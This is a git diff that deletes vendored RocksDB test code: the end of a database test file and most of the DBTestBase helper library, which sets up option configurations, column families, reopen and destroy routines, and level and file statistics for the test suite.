-    size_t direct_io_extra = use_direct_io ? 512 * 1024 : 0;
-    ASSERT_GE(rate_limited_bytes,
-              static_cast<size_t>(kNumKeysPerFile * kBytesPerKey * kNumL0Files +
-                                  direct_io_extra));
-    ASSERT_LT(
-        rate_limited_bytes,
-        static_cast<size_t>(2 * kNumKeysPerFile * kBytesPerKey * kNumL0Files +
-                            direct_io_extra));
-
-    Iterator* iter = db_->NewIterator(ReadOptions());
-    for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-      ASSERT_EQ(iter->value().ToString(), DummyString(kBytesPerKey));
-    }
-    delete iter;
-    // bytes read for user iterator shouldn't count against the rate limit.
-    ASSERT_EQ(rate_limited_bytes,
-              static_cast<size_t>(
-                  options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW)));
-  }
-}
-#endif  // ROCKSDB_LITE
-
-// Make sure DB can be reopen with reduced number of levels, given no file
-// is on levels higher than the new num_levels.
-TEST_F(DBTest2, ReduceLevel) {
-  Options options;
-  options.disable_auto_compactions = true;
-  options.num_levels = 7;
-  Reopen(options);
-  Put("foo", "bar");
-  Flush();
-  MoveFilesToLevel(6);
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("0,0,0,0,0,0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-  CompactRangeOptions compact_options;
-  compact_options.change_level = true;
-  compact_options.target_level = 1;
-  dbfull()->CompactRange(compact_options, nullptr, nullptr);
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-  options.num_levels = 3;
-  Reopen(options);
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("0,1", FilesPerLevel());
-#endif  // !ROCKSDB_LITE
-}
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_test_util.cc b/thirdparty/rocksdb/db/db_test_util.cc
deleted file mode 100644
index c4d465b..0000000
--- a/thirdparty/rocksdb/db/db_test_util.cc
+++ /dev/null
@@ -1,1395 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "db/forward_iterator.h"
-#include "rocksdb/env_encryption.h"
-
-namespace rocksdb {
-
-// Special Env used to delay background operations
-
-SpecialEnv::SpecialEnv(Env* base)
-    : EnvWrapper(base),
-      rnd_(301),
-      sleep_counter_(this),
-      addon_time_(0),
-      time_elapse_only_sleep_(false),
-      no_slowdown_(false) {
-  delay_sstable_sync_.store(false, std::memory_order_release);
-  drop_writes_.store(false, std::memory_order_release);
-  no_space_.store(false, std::memory_order_release);
-  non_writable_.store(false, std::memory_order_release);
-  count_random_reads_ = false;
-  count_sequential_reads_ = false;
-  manifest_sync_error_.store(false, std::memory_order_release);
-  manifest_write_error_.store(false, std::memory_order_release);
-  log_write_error_.store(false, std::memory_order_release);
-  random_file_open_counter_.store(0, std::memory_order_relaxed);
-  delete_count_.store(0, std::memory_order_relaxed);
-  num_open_wal_file_.store(0);
-  log_write_slowdown_ = 0;
-  bytes_written_ = 0;
-  sync_counter_ = 0;
-  non_writeable_rate_ = 0;
-  new_writable_count_ = 0;
-  non_writable_count_ = 0;
-  table_write_callback_ = nullptr;
-}
-#ifndef ROCKSDB_LITE
-ROT13BlockCipher rot13Cipher_(16);
-#endif  // ROCKSDB_LITE
-
-DBTestBase::DBTestBase(const std::string path)
-    : mem_env_(!getenv("MEM_ENV") ? nullptr : new MockEnv(Env::Default())),
-#ifndef ROCKSDB_LITE
-      encrypted_env_(
-          !getenv("ENCRYPTED_ENV")
-              ? nullptr
-              : NewEncryptedEnv(mem_env_ ? mem_env_ : Env::Default(),
-                                new CTREncryptionProvider(rot13Cipher_))),
-#else
-      encrypted_env_(nullptr),
-#endif  // ROCKSDB_LITE
-      env_(new SpecialEnv(encrypted_env_
-                              ? encrypted_env_
-                              : (mem_env_ ? mem_env_ : Env::Default()))),
-      option_config_(kDefault) {
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  dbname_ = test::TmpDir(env_) + path;
-  alternative_wal_dir_ = dbname_ + "/wal";
-  alternative_db_log_dir_ = dbname_ + "/db_log_dir";
-  auto options = CurrentOptions();
-  options.env = env_;
-  auto delete_options = options;
-  delete_options.wal_dir = alternative_wal_dir_;
-  EXPECT_OK(DestroyDB(dbname_, delete_options));
-  // Destroy it for not alternative WAL dir is used.
-  EXPECT_OK(DestroyDB(dbname_, options));
-  db_ = nullptr;
-  Reopen(options);
-  Random::GetTLSInstance()->Reset(0xdeadbeef);
-}
-
-DBTestBase::~DBTestBase() {
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-  Close();
-  Options options;
-  options.db_paths.emplace_back(dbname_, 0);
-  options.db_paths.emplace_back(dbname_ + "_2", 0);
-  options.db_paths.emplace_back(dbname_ + "_3", 0);
-  options.db_paths.emplace_back(dbname_ + "_4", 0);
-  options.env = env_;
-
-  if (getenv("KEEP_DB")) {
-    printf("DB is still at %s\n", dbname_.c_str());
-  } else {
-    EXPECT_OK(DestroyDB(dbname_, options));
-  }
-  delete env_;
-}
-
-bool DBTestBase::ShouldSkipOptions(int option_config, int skip_mask) {
-#ifdef ROCKSDB_LITE
-    // These options are not supported in ROCKSDB_LITE
-  if (option_config == kHashSkipList ||
-      option_config == kPlainTableFirstBytePrefix ||
-      option_config == kPlainTableCappedPrefix ||
-      option_config == kPlainTableCappedPrefixNonMmap ||
-      option_config == kPlainTableAllBytesPrefix ||
-      option_config == kVectorRep || option_config == kHashLinkList ||
-      option_config == kHashCuckoo || option_config == kUniversalCompaction ||
-      option_config == kUniversalCompactionMultiLevel ||
-      option_config == kUniversalSubcompactions ||
-      option_config == kFIFOCompaction ||
-      option_config == kConcurrentSkipList) {
-    return true;
-    }
-#endif
-
-    if ((skip_mask & kSkipUniversalCompaction) &&
-        (option_config == kUniversalCompaction ||
-         option_config == kUniversalCompactionMultiLevel)) {
-      return true;
-    }
-    if ((skip_mask & kSkipMergePut) && option_config == kMergePut) {
-      return true;
-    }
-    if ((skip_mask & kSkipNoSeekToLast) &&
-        (option_config == kHashLinkList || option_config == kHashSkipList)) {
-      return true;
-    }
-    if ((skip_mask & kSkipPlainTable) &&
-        (option_config == kPlainTableAllBytesPrefix ||
-         option_config == kPlainTableFirstBytePrefix ||
-         option_config == kPlainTableCappedPrefix ||
-         option_config == kPlainTableCappedPrefixNonMmap)) {
-      return true;
-    }
-    if ((skip_mask & kSkipHashIndex) &&
-        (option_config == kBlockBasedTableWithPrefixHashIndex ||
-         option_config == kBlockBasedTableWithWholeKeyHashIndex)) {
-      return true;
-    }
-    if ((skip_mask & kSkipHashCuckoo) && (option_config == kHashCuckoo)) {
-      return true;
-    }
-    if ((skip_mask & kSkipFIFOCompaction) && option_config == kFIFOCompaction) {
-      return true;
-    }
-    if ((skip_mask & kSkipMmapReads) && option_config == kWalDirAndMmapReads) {
-      return true;
-    }
-    return false;
-}
-
-// Switch to a fresh database with the next option configuration to
-// test.  Return false if there are no more configurations to test.
-bool DBTestBase::ChangeOptions(int skip_mask) {
-  for (option_config_++; option_config_ < kEnd; option_config_++) {
-    if (ShouldSkipOptions(option_config_, skip_mask)) {
-      continue;
-    }
-    break;
-  }
-
-  if (option_config_ >= kEnd) {
-    Destroy(last_options_);
-    return false;
-  } else {
-    auto options = CurrentOptions();
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    return true;
-  }
-}
-
-// Switch between different compaction styles.
-bool DBTestBase::ChangeCompactOptions() {
-  if (option_config_ == kDefault) {
-    option_config_ = kUniversalCompaction;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kUniversalCompaction) {
-    option_config_ = kUniversalCompactionMultiLevel;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kUniversalCompactionMultiLevel) {
-    option_config_ = kLevelSubcompactions;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    assert(options.max_subcompactions > 1);
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kLevelSubcompactions) {
-    option_config_ = kUniversalSubcompactions;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    assert(options.max_subcompactions > 1);
-    TryReopen(options);
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Switch between different WAL settings
-bool DBTestBase::ChangeWalOptions() {
-  if (option_config_ == kDefault) {
-    option_config_ = kDBLogDir;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    Destroy(options);
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kDBLogDir) {
-    option_config_ = kWalDirAndMmapReads;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    Destroy(options);
-    options.create_if_missing = true;
-    TryReopen(options);
-    return true;
-  } else if (option_config_ == kWalDirAndMmapReads) {
-    option_config_ = kRecycleLogFiles;
-    Destroy(last_options_);
-    auto options = CurrentOptions();
-    Destroy(options);
-    TryReopen(options);
-    return true;
-  } else {
-    return false;
-  }
-}
-
-// Switch between different filter policy
-// Jump from kDefault to kFilter to kFullFilter
-bool DBTestBase::ChangeFilterOptions() {
-  if (option_config_ == kDefault) {
-    option_config_ = kFilter;
-  } else if (option_config_ == kFilter) {
-    option_config_ = kFullFilterWithNewTableReaderForCompactions;
-  } else if (option_config_ == kFullFilterWithNewTableReaderForCompactions) {
-    option_config_ = kPartitionedFilterWithNewTableReaderForCompactions;
-  } else {
-    return false;
-  }
-  Destroy(last_options_);
-
-  auto options = CurrentOptions();
-  options.create_if_missing = true;
-  TryReopen(options);
-  return true;
-}
-
-// Return the current option configuration.
-Options DBTestBase::CurrentOptions(
-    const anon::OptionsOverride& options_override) const {
-  return GetOptions(option_config_, GetDefaultOptions(), options_override);
-}
-
-Options DBTestBase::CurrentOptions(
-    const Options& default_options,
-    const anon::OptionsOverride& options_override) const {
-  return GetOptions(option_config_, default_options, options_override);
-}
-
-Options DBTestBase::GetDefaultOptions() {
-  Options options;
-  options.write_buffer_size = 4090 * 4096;
-  options.target_file_size_base = 2 * 1024 * 1024;
-  options.max_bytes_for_level_base = 10 * 1024 * 1024;
-  options.max_open_files = 5000;
-  options.wal_recovery_mode = WALRecoveryMode::kTolerateCorruptedTailRecords;
-  options.compaction_pri = CompactionPri::kByCompensatedSize;
-  return options;
-}
-
-Options DBTestBase::GetOptions(
-    int option_config, const Options& default_options,
-    const anon::OptionsOverride& options_override) const {
-  // this redundant copy is to minimize code change w/o having lint error.
-  Options options = default_options;
-  BlockBasedTableOptions table_options;
-  bool set_block_based_table_factory = true;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) &&  \
-  !defined(OS_AIX)
-  rocksdb::SyncPoint::GetInstance()->ClearCallBack(
-      "NewRandomAccessFile:O_DIRECT");
-  rocksdb::SyncPoint::GetInstance()->ClearCallBack(
-      "NewWritableFile:O_DIRECT");
-#endif
-
-  bool can_allow_mmap = IsMemoryMappedAccessSupported();
-  switch (option_config) {
-#ifndef ROCKSDB_LITE
-    case kHashSkipList:
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      options.memtable_factory.reset(NewHashSkipListRepFactory(16));
-      options.allow_concurrent_memtable_write = false;
-      break;
-    case kPlainTableFirstBytePrefix:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      options.allow_mmap_reads = can_allow_mmap;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kPlainTableCappedPrefix:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewCappedPrefixTransform(8));
-      options.allow_mmap_reads = can_allow_mmap;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kPlainTableCappedPrefixNonMmap:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewCappedPrefixTransform(8));
-      options.allow_mmap_reads = false;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kPlainTableAllBytesPrefix:
-      options.table_factory.reset(new PlainTableFactory());
-      options.prefix_extractor.reset(NewNoopTransform());
-      options.allow_mmap_reads = can_allow_mmap;
-      options.max_sequential_skip_in_iterations = 999999;
-      set_block_based_table_factory = false;
-      break;
-    case kVectorRep:
-      options.memtable_factory.reset(new VectorRepFactory(100));
-      options.allow_concurrent_memtable_write = false;
-      break;
-    case kHashLinkList:
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      options.memtable_factory.reset(
-          NewHashLinkListRepFactory(4, 0, 3, true, 4));
-      options.allow_concurrent_memtable_write = false;
-      break;
-    case kHashCuckoo:
-      options.memtable_factory.reset(
-          NewHashCuckooRepFactory(options.write_buffer_size));
-      options.allow_concurrent_memtable_write = false;
-      break;
-#endif  // ROCKSDB_LITE
-    case kMergePut:
-      options.merge_operator = MergeOperators::CreatePutOperator();
-      break;
-    case kFilter:
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-      break;
-    case kFullFilterWithNewTableReaderForCompactions:
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-      options.new_table_reader_for_compaction_inputs = true;
-      options.compaction_readahead_size = 10 * 1024 * 1024;
-      break;
-    case kPartitionedFilterWithNewTableReaderForCompactions:
-      table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-      table_options.partition_filters = true;
-      table_options.index_type =
-          BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-      options.new_table_reader_for_compaction_inputs = true;
-      options.compaction_readahead_size = 10 * 1024 * 1024;
-      break;
-    case kUncompressed:
-      options.compression = kNoCompression;
-      break;
-    case kNumLevel_3:
-      options.num_levels = 3;
-      break;
-    case kDBLogDir:
-      options.db_log_dir = alternative_db_log_dir_;
-      break;
-    case kWalDirAndMmapReads:
-      options.wal_dir = alternative_wal_dir_;
-      // mmap reads should be orthogonal to WalDir setting, so we piggyback to
-      // this option config to test mmap reads as well
-      options.allow_mmap_reads = can_allow_mmap;
-      break;
-    case kManifestFileSize:
-      options.max_manifest_file_size = 50;  // 50 bytes
-      break;
-    case kPerfOptions:
-      options.soft_rate_limit = 2.0;
-      options.delayed_write_rate = 8 * 1024 * 1024;
-      options.report_bg_io_stats = true;
-      // TODO(3.13) -- test more options
-      break;
-    case kUniversalCompaction:
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 1;
-      break;
-    case kUniversalCompactionMultiLevel:
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 8;
-      break;
-    case kCompressedBlockCache:
-      options.allow_mmap_writes = can_allow_mmap;
-      table_options.block_cache_compressed = NewLRUCache(8 * 1024 * 1024);
-      break;
-    case kInfiniteMaxOpenFiles:
-      options.max_open_files = -1;
-      break;
-    case kxxHashChecksum: {
-      table_options.checksum = kxxHash;
-      break;
-    }
-    case kFIFOCompaction: {
-      options.compaction_style = kCompactionStyleFIFO;
-      break;
-    }
-    case kBlockBasedTableWithPrefixHashIndex: {
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      options.prefix_extractor.reset(NewFixedPrefixTransform(1));
-      break;
-    }
-    case kBlockBasedTableWithWholeKeyHashIndex: {
-      table_options.index_type = BlockBasedTableOptions::kHashSearch;
-      options.prefix_extractor.reset(NewNoopTransform());
-      break;
-    }
-    case kBlockBasedTableWithPartitionedIndex: {
-      table_options.index_type = BlockBasedTableOptions::kTwoLevelIndexSearch;
-      options.prefix_extractor.reset(NewNoopTransform());
-      break;
-    }
-    case kBlockBasedTableWithIndexRestartInterval: {
-      table_options.index_block_restart_interval = 8;
-      break;
-    }
-    case kOptimizeFiltersForHits: {
-      options.optimize_filters_for_hits = true;
-      set_block_based_table_factory = true;
-      break;
-    }
-    case kRowCache: {
-      options.row_cache = NewLRUCache(1024 * 1024);
-      break;
-    }
-    case kRecycleLogFiles: {
-      options.recycle_log_file_num = 2;
-      break;
-    }
-    case kLevelSubcompactions: {
-      options.max_subcompactions = 4;
-      break;
-    }
-    case kUniversalSubcompactions: {
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 8;
-      options.max_subcompactions = 4;
-      break;
-    }
-    case kConcurrentSkipList: {
-      options.allow_concurrent_memtable_write = true;
-      options.enable_write_thread_adaptive_yield = true;
-      break;
-    }
-    case kDirectIO: {
-      options.use_direct_reads = true;
-      options.use_direct_io_for_flush_and_compaction = true;
-      options.compaction_readahead_size = 2 * 1024 * 1024;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \
-    !defined(OS_AIX)
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "NewWritableFile:O_DIRECT", [&](void* arg) {
-            int* val = static_cast<int*>(arg);
-            *val &= ~O_DIRECT;
-          });
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "NewRandomAccessFile:O_DIRECT", [&](void* arg) {
-            int* val = static_cast<int*>(arg);
-            *val &= ~O_DIRECT;
-          });
-      rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-#endif
-      break;
-    }
-    case kPipelinedWrite: {
-      options.enable_pipelined_write = true;
-      break;
-    }
-    case kConcurrentWALWrites: {
-      // This options optimize 2PC commit path
-      options.concurrent_prepare = true;
-      options.manual_wal_flush = true;
-      break;
-    }
-
-    default:
-      break;
-  }
-
-  if (options_override.filter_policy) {
-    table_options.filter_policy = options_override.filter_policy;
-    table_options.partition_filters = options_override.partition_filters;
-    table_options.metadata_block_size = options_override.metadata_block_size;
-  }
-  if (set_block_based_table_factory) {
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-  options.env = env_;
-  options.create_if_missing = true;
-  options.fail_if_options_file_error = true;
-  return options;
-}
-
-void DBTestBase::CreateColumnFamilies(const std::vector<std::string>& cfs,
-                                      const Options& options) {
-  ColumnFamilyOptions cf_opts(options);
-  size_t cfi = handles_.size();
-  handles_.resize(cfi + cfs.size());
-  for (auto cf : cfs) {
-    ASSERT_OK(db_->CreateColumnFamily(cf_opts, cf, &handles_[cfi++]));
-  }
-}
-
-void DBTestBase::CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                                       const Options& options) {
-  CreateColumnFamilies(cfs, options);
-  std::vector<std::string> cfs_plus_default = cfs;
-  cfs_plus_default.insert(cfs_plus_default.begin(), kDefaultColumnFamilyName);
-  ReopenWithColumnFamilies(cfs_plus_default, options);
-}
-
-void DBTestBase::ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                          const std::vector<Options>& options) {
-  ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-}
-
-void DBTestBase::ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                          const Options& options) {
-  ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-}
-
-Status DBTestBase::TryReopenWithColumnFamilies(
-    const std::vector<std::string>& cfs, const std::vector<Options>& options) {
-  Close();
-  EXPECT_EQ(cfs.size(), options.size());
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (size_t i = 0; i < cfs.size(); ++i) {
-    column_families.push_back(ColumnFamilyDescriptor(cfs[i], options[i]));
-  }
-  DBOptions db_opts = DBOptions(options[0]);
-  return DB::Open(db_opts, dbname_, column_families, &handles_, &db_);
-}
-
-Status DBTestBase::TryReopenWithColumnFamilies(
-    const std::vector<std::string>& cfs, const Options& options) {
-  Close();
-  std::vector<Options> v_opts(cfs.size(), options);
-  return TryReopenWithColumnFamilies(cfs, v_opts);
-}
-
-void DBTestBase::Reopen(const Options& options) {
-  ASSERT_OK(TryReopen(options));
-}
-
-void DBTestBase::Close() {
-  for (auto h : handles_) {
-    db_->DestroyColumnFamilyHandle(h);
-  }
-  handles_.clear();
-  delete db_;
-  db_ = nullptr;
-}
-
-void DBTestBase::DestroyAndReopen(const Options& options) {
-  // Destroy using last options
-  Destroy(last_options_);
-  ASSERT_OK(TryReopen(options));
-}
-
-void DBTestBase::Destroy(const Options& options) {
-  Close();
-  ASSERT_OK(DestroyDB(dbname_, options));
-}
-
-Status DBTestBase::ReadOnlyReopen(const Options& options) {
-  return DB::OpenForReadOnly(options, dbname_, &db_);
-}
-
-Status DBTestBase::TryReopen(const Options& options) {
-  Close();
-  last_options_.table_factory.reset();
-  // Note: operator= is an unsafe approach here since it destructs shared_ptr in
-  // the same order of their creation, in contrast to destructors which
-  // destructs them in the opposite order of creation. One particular problme is
-  // that the cache destructor might invoke callback functions that use Option
-  // members such as statistics. To work around this problem, we manually call
-  // destructor of table_facotry which eventually clears the block cache.
-  last_options_ = options;
-  return DB::Open(options, dbname_, &db_);
-}
-
-bool DBTestBase::IsDirectIOSupported() {
-  EnvOptions env_options;
-  env_options.use_mmap_writes = false;
-  env_options.use_direct_writes = true;
-  std::string tmp = TempFileName(dbname_, 999);
-  Status s;
-  {
-    unique_ptr<WritableFile> file;
-    s = env_->NewWritableFile(tmp, &file, env_options);
-  }
-  if (s.ok()) {
-    s = env_->DeleteFile(tmp);
-  }
-  return s.ok();
-}
-
-bool DBTestBase::IsMemoryMappedAccessSupported() const {
-  return (!encrypted_env_);
-}
-
-Status DBTestBase::Flush(int cf) {
-  if (cf == 0) {
-    return db_->Flush(FlushOptions());
-  } else {
-    return db_->Flush(FlushOptions(), handles_[cf]);
-  }
-}
-
-Status DBTestBase::Put(const Slice& k, const Slice& v, WriteOptions wo) {
-  if (kMergePut == option_config_) {
-    return db_->Merge(wo, k, v);
-  } else {
-    return db_->Put(wo, k, v);
-  }
-}
-
-Status DBTestBase::Put(int cf, const Slice& k, const Slice& v,
-                       WriteOptions wo) {
-  if (kMergePut == option_config_) {
-    return db_->Merge(wo, handles_[cf], k, v);
-  } else {
-    return db_->Put(wo, handles_[cf], k, v);
-  }
-}
-
-Status DBTestBase::Merge(const Slice& k, const Slice& v, WriteOptions wo) {
-  return db_->Merge(wo, k, v);
-}
-
-Status DBTestBase::Merge(int cf, const Slice& k, const Slice& v,
-                         WriteOptions wo) {
-  return db_->Merge(wo, handles_[cf], k, v);
-}
-
-Status DBTestBase::Delete(const std::string& k) {
-  return db_->Delete(WriteOptions(), k);
-}
-
-Status DBTestBase::Delete(int cf, const std::string& k) {
-  return db_->Delete(WriteOptions(), handles_[cf], k);
-}
-
-Status DBTestBase::SingleDelete(const std::string& k) {
-  return db_->SingleDelete(WriteOptions(), k);
-}
-
-Status DBTestBase::SingleDelete(int cf, const std::string& k) {
-  return db_->SingleDelete(WriteOptions(), handles_[cf], k);
-}
-
-std::string DBTestBase::Get(const std::string& k, const Snapshot* snapshot) {
-  ReadOptions options;
-  options.verify_checksums = true;
-  options.snapshot = snapshot;
-  std::string result;
-  Status s = db_->Get(options, k, &result);
-  if (s.IsNotFound()) {
-    result = "NOT_FOUND";
-  } else if (!s.ok()) {
-    result = s.ToString();
-  }
-  return result;
-}
-
-std::string DBTestBase::Get(int cf, const std::string& k,
-                            const Snapshot* snapshot) {
-  ReadOptions options;
-  options.verify_checksums = true;
-  options.snapshot = snapshot;
-  std::string result;
-  Status s = db_->Get(options, handles_[cf], k, &result);
-  if (s.IsNotFound()) {
-    result = "NOT_FOUND";
-  } else if (!s.ok()) {
-    result = s.ToString();
-  }
-  return result;
-}
-
-Status DBTestBase::Get(const std::string& k, PinnableSlice* v) {
-  ReadOptions options;
-  options.verify_checksums = true;
-  Status s = dbfull()->Get(options, dbfull()->DefaultColumnFamily(), k, v);
-  return s;
-}
-
-uint64_t DBTestBase::GetNumSnapshots() {
-  uint64_t int_num;
-  EXPECT_TRUE(dbfull()->GetIntProperty("rocksdb.num-snapshots", &int_num));
-  return int_num;
-}
-
-uint64_t DBTestBase::GetTimeOldestSnapshots() {
-  uint64_t int_num;
-  EXPECT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.oldest-snapshot-time", &int_num));
-  return int_num;
-}
-
-// Return a string that contains all key,value pairs in order,
-// formatted like "(k1->v1)(k2->v2)".
-std::string DBTestBase::Contents(int cf) {
-  std::vector<std::string> forward;
-  std::string result;
-  Iterator* iter = (cf == 0) ? db_->NewIterator(ReadOptions())
-                             : db_->NewIterator(ReadOptions(), handles_[cf]);
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    std::string s = IterStatus(iter);
-    result.push_back('(');
-    result.append(s);
-    result.push_back(')');
-    forward.push_back(s);
-  }
-
-  // Check reverse iteration results are the reverse of forward results
-  unsigned int matched = 0;
-  for (iter->SeekToLast(); iter->Valid(); iter->Prev()) {
-    EXPECT_LT(matched, forward.size());
-    EXPECT_EQ(IterStatus(iter), forward[forward.size() - matched - 1]);
-    matched++;
-  }
-  EXPECT_EQ(matched, forward.size());
-
-  delete iter;
-  return result;
-}
-
-std::string DBTestBase::AllEntriesFor(const Slice& user_key, int cf) {
-  Arena arena;
-  auto options = CurrentOptions();
-  InternalKeyComparator icmp(options.comparator);
-  RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-  ScopedArenaIterator iter;
-  if (cf == 0) {
-    iter.set(dbfull()->NewInternalIterator(&arena, &range_del_agg));
-  } else {
-    iter.set(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg, handles_[cf]));
-  }
-  InternalKey target(user_key, kMaxSequenceNumber, kTypeValue);
-  iter->Seek(target.Encode());
-  std::string result;
-  if (!iter->status().ok()) {
-    result = iter->status().ToString();
-  } else {
-    result = "[ ";
-    bool first = true;
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      if (!ParseInternalKey(iter->key(), &ikey)) {
-        result += "CORRUPTED";
-      } else {
-        if (!last_options_.comparator->Equal(ikey.user_key, user_key)) {
-          break;
-        }
-        if (!first) {
-          result += ", ";
-        }
-        first = false;
-        switch (ikey.type) {
-          case kTypeValue:
-            result += iter->value().ToString();
-            break;
-          case kTypeMerge:
-            // keep it the same as kTypeValue for testing kMergePut
-            result += iter->value().ToString();
-            break;
-          case kTypeDeletion:
-            result += "DEL";
-            break;
-          case kTypeSingleDeletion:
-            result += "SDEL";
-            break;
-          default:
-            assert(false);
-            break;
-        }
-      }
-      iter->Next();
-    }
-    if (!first) {
-      result += " ";
-    }
-    result += "]";
-  }
-  return result;
-}
-
-#ifndef ROCKSDB_LITE
-int DBTestBase::NumSortedRuns(int cf) {
-  ColumnFamilyMetaData cf_meta;
-  if (cf == 0) {
-    db_->GetColumnFamilyMetaData(&cf_meta);
-  } else {
-    db_->GetColumnFamilyMetaData(handles_[cf], &cf_meta);
-  }
-  int num_sr = static_cast<int>(cf_meta.levels[0].files.size());
-  for (size_t i = 1U; i < cf_meta.levels.size(); i++) {
-    if (cf_meta.levels[i].files.size() > 0) {
-      num_sr++;
-    }
-  }
-  return num_sr;
-}
-
-uint64_t DBTestBase::TotalSize(int cf) {
-  ColumnFamilyMetaData cf_meta;
-  if (cf == 0) {
-    db_->GetColumnFamilyMetaData(&cf_meta);
-  } else {
-    db_->GetColumnFamilyMetaData(handles_[cf], &cf_meta);
-  }
-  return cf_meta.size;
-}
-
-uint64_t DBTestBase::SizeAtLevel(int level) {
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  uint64_t sum = 0;
-  for (const auto& m : metadata) {
-    if (m.level == level) {
-      sum += m.size;
-    }
-  }
-  return sum;
-}
-
-size_t DBTestBase::TotalLiveFiles(int cf) {
-  ColumnFamilyMetaData cf_meta;
-  if (cf == 0) {
-    db_->GetColumnFamilyMetaData(&cf_meta);
-  } else {
-    db_->GetColumnFamilyMetaData(handles_[cf], &cf_meta);
-  }
-  size_t num_files = 0;
-  for (auto& level : cf_meta.levels) {
-    num_files += level.files.size();
-  }
-  return num_files;
-}
-
-size_t DBTestBase::CountLiveFiles() {
-  std::vector<LiveFileMetaData> metadata;
-  db_->GetLiveFilesMetaData(&metadata);
-  return metadata.size();
-}
-#endif  // ROCKSDB_LITE
-
-int DBTestBase::NumTableFilesAtLevel(int level, int cf) {
-  std::string property;
-  if (cf == 0) {
-    // default cfd
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.num-files-at-level" + NumberToString(level), &property));
-  } else {
-    EXPECT_TRUE(db_->GetProperty(
-        handles_[cf], "rocksdb.num-files-at-level" + NumberToString(level),
-        &property));
-  }
-  return atoi(property.c_str());
-}
-
-double DBTestBase::CompressionRatioAtLevel(int level, int cf) {
-  std::string property;
-  if (cf == 0) {
-    // default cfd
-    EXPECT_TRUE(db_->GetProperty(
-        "rocksdb.compression-ratio-at-level" + NumberToString(level),
-        &property));
-  } else {
-    EXPECT_TRUE(db_->GetProperty(
-        handles_[cf],
-        "rocksdb.compression-ratio-at-level" + NumberToString(level),
-        &property));
-  }
-  return std::stod(property);
-}
-
-int DBTestBase::TotalTableFiles(int cf, int levels) {
-  if (levels == -1) {
-    levels = (cf == 0) ? db_->NumberLevels() : db_->NumberLevels(handles_[1]);
-  }
-  int result = 0;
-  for (int level = 0; level < levels; level++) {
